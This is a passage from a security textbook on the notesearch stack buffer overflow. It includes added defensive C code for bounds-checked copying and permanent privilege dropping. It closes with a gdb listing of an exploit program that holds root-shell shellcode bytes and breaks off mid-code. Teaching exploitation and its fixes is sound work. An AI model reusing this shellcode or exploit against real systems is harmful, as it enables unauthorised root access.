The notesearch program is vulnerable to a buffer overflow on the strcpy() line in the excerpt below (shown in bold in the original), which copies argv[1] into a 100-byte stack buffer without checking its length.
int main(int argc, char *argv[]) {
   int userid, printing=1, fd; // File descriptor
   char searchstring[100];

   if(argc > 1)                      // If there is an arg
      strcpy(searchstring, argv[1]); // that is the search string; (no length check: the overflow is here)
   else                              // otherwise,
      searchstring[0] = 0;           // search string is empty.
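The fix a defender would apply to that line is a bounded copy that refuses input which does not fit in the 100-byte buffer. The following is an added example, not code from the book or from notesearch itself: set_searchstring(), parse_search_arg() and the SEARCH_MAX constant are assumed names written here to mirror the argument handling in notesearch's main(), and an over-long argument is rejected with a non-zero return instead of silently truncated, so the caller cannot mistake a cut-off search string for the one the user typed.

```c
#include <stdio.h>
#include <string.h>

#define SEARCH_MAX 100   /* same capacity as notesearch's searchstring[100] */

/* Bounded replacement for the unchecked strcpy() in notesearch's main().
 * Copies src into dst (capacity dst_len) only if it fits together with
 * the terminating NUL. Returns 0 on success and -1 if the input is too
 * long; on failure dst is left as an empty string so later code never
 * sees a partially written buffer. */
int set_searchstring(char *dst, size_t dst_len, const char *src) {
    size_t n;

    if (dst == NULL || dst_len == 0 || src == NULL)
        return -1;
    n = strlen(src);
    if (n >= dst_len) {          /* would overflow, or leave no room for NUL */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);     /* n bytes plus the NUL, known to fit */
    return 0;
}

/* Mirrors the argc/argv handling in notesearch's main(): no argument
 * means an empty search string. Returns 0 on success, -1 if argv[1]
 * is too long for the buffer. */
int parse_search_arg(int argc, char *argv[], char *dst, size_t dst_len) {
    const char *src = (argc > 1) ? argv[1] : "";
    return set_searchstring(dst, dst_len, src);
}

int main(int argc, char *argv[]) {
    char searchstring[SEARCH_MAX];

    if (parse_search_arg(argc, argv, searchstring, sizeof searchstring) != 0) {
        fprintf(stderr, "search string too long (max %d bytes)\n", SEARCH_MAX - 1);
        return 1;
    }
    printf("searching for: \"%s\"\n", searchstring);
    return 0;
}
```

Passing sizeof searchstring rather than a repeated literal keeps the bound tied to the actual buffer, so changing the array size cannot reintroduce the overflow. This closes the specific bug; it does not change the suid-root exposure discussed next, which needs a separate mitigation.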
The notesearch exploit uses a similar technique to overflow a buffer into
the return address; however, it also injects its own instructions into memory
and then returns execution there. These instructions are called shellcode, and
they tell the program to restore privileges and open a shell prompt. This is
especially devastating for the notesearch program, since it is suid root. Since
this program expects multiuser access, it runs under higher privileges so it can
access its data file, but the program logic prevents the user from using these
higher privileges for anything other than accessing the data file; at least
that's the intention.
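The reason the shellcode can "restore privileges" is that a suid-root process keeps root available for as long as it runs. The defensive counterpart to the paragraph above is to do the one privileged operation first (open the data file) and then drop privileges permanently before any untrusted input such as argv is touched. The block below is an added example, not the book's notesearch code: drop_privileges_permanently() and open_data_file_then_drop() are assumed names, and DATA_FILE is a constructed placeholder path, not notesearch's real data file.

```c
#include <stdio.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>

/* Constructed placeholder; notesearch's real data file path is not used here. */
#define DATA_FILE "/path/to/data-file-placeholder"

/* Permanently drop to the real user's identity and verify that the drop
 * took effect. Returns 0 on success, -1 on failure.
 *
 * When the effective uid is 0 (as in a suid-root binary), setuid() sets
 * the real, effective and saved uids together, so code that runs later,
 * whether the program's own or injected through an overflow, cannot call
 * setuid(0)/seteuid(0) to get root back. A plain seteuid(getuid()) would
 * leave the saved uid at 0 and therefore be reversible. */
int drop_privileges_permanently(void) {
    uid_t target = getuid();
    int was_root = (geteuid() == 0);

    if (setuid(target) != 0)
        return -1;
    /* Verify rather than trust: both ids must now be the real user. */
    if (getuid() != target || geteuid() != target)
        return -1;
    /* If we held root and dropped to a non-root user, regaining must fail. */
    if (was_root && target != 0) {
        if (seteuid(0) == 0)
            return -1;              /* drop was not permanent */
        if (errno != EPERM)
            return -1;
    }
    return 0;
}

/* Order of operations for a suid helper: use the privilege for exactly
 * the operation that needs it, then give it up before parsing argv.
 * Returns the open descriptor, or -1 on failure. */
int open_data_file_then_drop(const char *path) {
    int fd = open(path, O_RDONLY);   /* privileged step: happens while still root */

    if (drop_privileges_permanently() != 0) {
        if (fd >= 0)
            close(fd);
        return -1;                   /* refuse to continue with root still reachable */
    }
    return fd;                       /* may be -1 if the file does not exist */
}

int main(int argc, char *argv[]) {
    int fd = open_data_file_then_drop(DATA_FILE);

    if (fd < 0) {
        fprintf(stderr, "could not open data file or drop privileges\n");
        return 1;
    }
    /* Only now is untrusted input handled; a copy of argv[1] here must still
     * be bounds-checked, because the overflow itself is not prevented by
     * dropping privileges. */
    printf("data file open on fd %d, running as uid %u with %d argument(s)\n",
           fd, (unsigned)getuid(), argc - 1);
    close(fd);
    return 0;
}
```

The caveat a practitioner should keep in mind: this reduces what a hijacked notesearch can do (a shell would run as the invoking user, not root), but it does not stop the memory corruption. The bounded copy of the search string is still required, and the privilege drop must happen before that copy, since an overflow that executes earlier would inherit whatever privileges the process still holds.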
But when new instructions can be injected in and execution can be
controlled with a buffer overflow, the program logic is meaningless. This
technique allows the program to do things it was never programmed to do,
while it's still running with elevated privileges. This is the dangerous combination
that allows the notesearch exploit to gain a root shell. Let's examine the
exploit further.
reader@hacking:~/booksrc $ gcc -g exploit_notesearch.c
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) list 1
1 #include <stdio.h>
2 #include <stdlib.h>
3 #include <string.h>
4 char shellcode[]=
5 "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
6 "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
7 "\xe1\xcd\x80";
8
9 int main(int argc, char *argv[]) {
10 unsigned int i, *ptr, ret, offset=270;
(gdb)
11 char *command, *buffer;
12
13 command = (char *) malloc(200);
14 bzero(command, 200); // Zero out the new memory.
15
16 strcpy(command, "./notesearch \'"); // Start command buffer.
17 buffer = command + strlen(command); // Set buffer at the end.
18
19 if(argc > 1) // Set offset.